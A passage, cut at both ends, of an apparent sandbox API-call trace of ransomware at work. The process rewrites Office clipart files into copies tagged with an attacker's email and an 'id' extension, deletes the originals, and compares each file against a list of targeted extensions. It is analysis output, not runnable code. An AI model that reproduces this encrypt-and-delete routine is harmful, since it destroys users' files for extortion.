(lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.169] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf")) returned 1 [0054.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0054.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0054.169] lstrlenW (lpString=".doc") returned 4 [0054.169] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.169] lstrlenW (lpString=".docx") returned 5 [0054.169] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.169] lstrlenW (lpString=".pdf") returned 4 [0054.169] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.169] lstrlenW (lpString=".xls") returned 4 [0054.169] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.169] lstrlenW (lpString=".xlsx") returned 5 [0054.169] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.169] lstrlenW (lpString=".ppt") returned 4 [0054.169] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0054.170] lstrlenW (lpString=".zip") returned 4 [0054.170] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.170] lstrlenW (lpString=".rar") returned 4 [0054.170] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.170] lstrlenW (lpString=".bz2") returned 4 [0054.170] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.170] lstrlenW (lpString=".7z") returned 3 [0054.170] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0054.170] lstrlenW (lpString=".dbf") returned 4 [0054.170] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0054.170] lstrlenW (lpString=".1cd") returned 4 [0054.170] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0054.170] lstrlenW (lpString=".jpg") returned 4 [0054.170] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.171] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.171] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0054.172] GetLastError () returned 0x0 [0054.172] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x1df4, lpOverlapped=0x0) returned 1 [0054.175] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x1e00, lpOverlapped=0x0) returned 1 [0054.176] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.176] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.176] SetEndOfFile (hFile=0x160) returned 1 [0054.176] CloseHandle (hObject=0x160) returned 1 [0054.176] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.176] SetEndOfFile (hFile=0x1f0) returned 1 [0054.177] CloseHandle (hObject=0x1f0) returned 1 [0054.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.177] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf")) returned 1 [0054.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0054.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0054.178] lstrlenW (lpString=".doc") returned 4 [0054.178] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.178] lstrlenW (lpString=".docx") returned 5 [0054.178] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.178] lstrlenW (lpString=".pdf") returned 4 [0054.178] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.178] lstrlenW (lpString=".xls") returned 4 [0054.178] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.178] lstrlenW (lpString=".xlsx") returned 5 [0054.178] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.178] lstrlenW (lpString=".ppt") returned 4 [0054.178] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0054.178] lstrlenW (lpString=".zip") returned 4 [0054.178] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.178] lstrlenW (lpString=".rar") returned 4 [0054.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.178] lstrlenW (lpString=".bz2") returned 4 [0054.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.178] lstrlenW (lpString=".7z") returned 3 [0054.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0054.179] lstrlenW (lpString=".dbf") returned 4 [0054.179] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0054.179] lstrlenW (lpString=".1cd") returned 4 [0054.179] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0054.179] lstrlenW (lpString=".jpg") returned 4 [0054.179] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.179] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.179] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0054.179] GetLastError () returned 0x0 [0054.179] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x212c, lpOverlapped=0x0) returned 1 [0054.182] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x2130, lpOverlapped=0x0) returned 1 [0054.183] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.183] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.183] SetEndOfFile (hFile=0x160) returned 1 [0054.183] CloseHandle (hObject=0x160) returned 1 [0054.183] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.183] SetEndOfFile (hFile=0x1f0) returned 1 [0054.184] CloseHandle (hObject=0x1f0) returned 1 [0054.184] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.184] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf")) returned 1 [0054.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0054.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0054.185] lstrlenW (lpString=".doc") returned 4 [0054.185] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.185] lstrlenW (lpString=".docx") returned 5 [0054.185] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.185] lstrlenW (lpString=".pdf") returned 4 [0054.185] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.185] lstrlenW (lpString=".xls") returned 4 [0054.185] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.185] lstrlenW (lpString=".xlsx") returned 5 [0054.185] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.185] lstrlenW (lpString=".ppt") returned 4 [0054.185] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0054.185] lstrlenW (lpString=".zip") returned 4 [0054.185] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.185] lstrlenW (lpString=".rar") returned 4 [0054.185] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.185] lstrlenW (lpString=".bz2") returned 4 [0054.185] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.185] lstrlenW (lpString=".7z") returned 3 [0054.185] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0054.185] lstrlenW (lpString=".dbf") returned 4 [0054.185] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0054.185] lstrlenW (lpString=".1cd") returned 4 [0054.185] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0054.185] lstrlenW (lpString=".jpg") returned 4 [0054.185] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.186] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.186] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0054.186] GetLastError () returned 0x0 [0054.186] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x1e7c, lpOverlapped=0x0) returned 1 [0054.189] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x1e80, lpOverlapped=0x0) returned 1 [0054.189] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.190] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.190] SetEndOfFile (hFile=0x160) returned 1 [0054.190] CloseHandle (hObject=0x160) returned 1 [0054.190] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.190] SetEndOfFile (hFile=0x1f0) returned 1 [0054.191] CloseHandle (hObject=0x1f0) returned 1 [0054.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.191] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf")) returned 1 [0054.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0054.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0054.191] lstrlenW (lpString=".doc") returned 4 [0054.191] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.191] lstrlenW (lpString=".docx") returned 5 [0054.191] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.191] lstrlenW (lpString=".pdf") returned 4 [0054.191] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.191] lstrlenW (lpString=".xls") returned 4 [0054.191] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.191] lstrlenW (lpString=".xlsx") returned 5 [0054.191] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.191] lstrlenW (lpString=".ppt") returned 4 [0054.191] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0054.191] lstrlenW (lpString=".zip") returned 4 [0054.192] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.192] lstrlenW (lpString=".rar") returned 4 [0054.192] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.192] lstrlenW (lpString=".bz2") returned 4 [0054.192] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.192] lstrlenW (lpString=".7z") returned 3 [0054.192] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0054.192] lstrlenW (lpString=".dbf") returned 4 [0054.192] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0054.192] lstrlenW (lpString=".1cd") returned 4 [0054.192] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0054.192] lstrlenW (lpString=".jpg") returned 4 [0054.192] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.192] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.192] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0054.193] GetLastError () returned 0x0 [0054.193] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x1e7c, lpOverlapped=0x0) returned 1 [0054.588] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x1e80, lpOverlapped=0x0) returned 1 [0054.602] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.602] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.602] SetEndOfFile (hFile=0x160) returned 1 [0054.602] CloseHandle (hObject=0x160) returned 1 [0054.602] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.602] SetEndOfFile (hFile=0x1f0) returned 1 [0054.603] CloseHandle (hObject=0x1f0) returned 1 [0054.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.603] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf")) returned 1 [0055.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0055.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0055.106] lstrlenW (lpString=".doc") returned 4 [0055.106] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.106] lstrlenW (lpString=".docx") returned 5 [0055.106] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.106] lstrlenW (lpString=".pdf") returned 4 [0055.106] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.106] lstrlenW (lpString=".xls") returned 4 [0055.106] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.106] lstrlenW (lpString=".xlsx") returned 5 [0055.106] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.106] lstrlenW (lpString=".ppt") returned 4 [0055.106] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0055.106] lstrlenW (lpString=".zip") returned 4 [0055.106] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.106] lstrlenW (lpString=".rar") returned 4 [0055.106] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.106] lstrlenW (lpString=".bz2") returned 4 [0055.106] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.106] lstrlenW (lpString=".7z") returned 3 [0055.106] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0055.106] lstrlenW (lpString=".dbf") returned 4 [0055.106] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0055.106] lstrlenW (lpString=".1cd") returned 4 [0055.107] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0055.107] lstrlenW (lpString=".jpg") returned 4 [0055.107] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.347] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=26748) returned 1 [0056.347] CloseHandle (hObject=0x224) returned 1 [0056.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf")) returned 0x20 [0056.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0056.348] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.348] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0056.349] GetLastError () returned 0x0 [0056.349] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x687c, lpOverlapped=0x0) returned 1 [0056.351] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x6880, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x6880, lpOverlapped=0x0) returned 1 [0056.352] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.352] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.352] SetEndOfFile (hFile=0x1c8) returned 1 [0056.352] CloseHandle (hObject=0x1c8) returned 1 [0056.352] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.353] SetEndOfFile (hFile=0x224) returned 1 [0056.353] CloseHandle (hObject=0x224) returned 1 [0056.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.354] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf")) returned 1 [0056.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0056.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0056.354] lstrlenW (lpString=".doc") returned 4 [0056.354] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.354] lstrlenW (lpString=".docx") returned 5 [0056.354] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.354] lstrlenW (lpString=".pdf") returned 4 [0056.354] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.354] lstrlenW (lpString=".xls") returned 4 [0056.354] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.354] lstrlenW (lpString=".xlsx") returned 5 [0056.354] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.354] 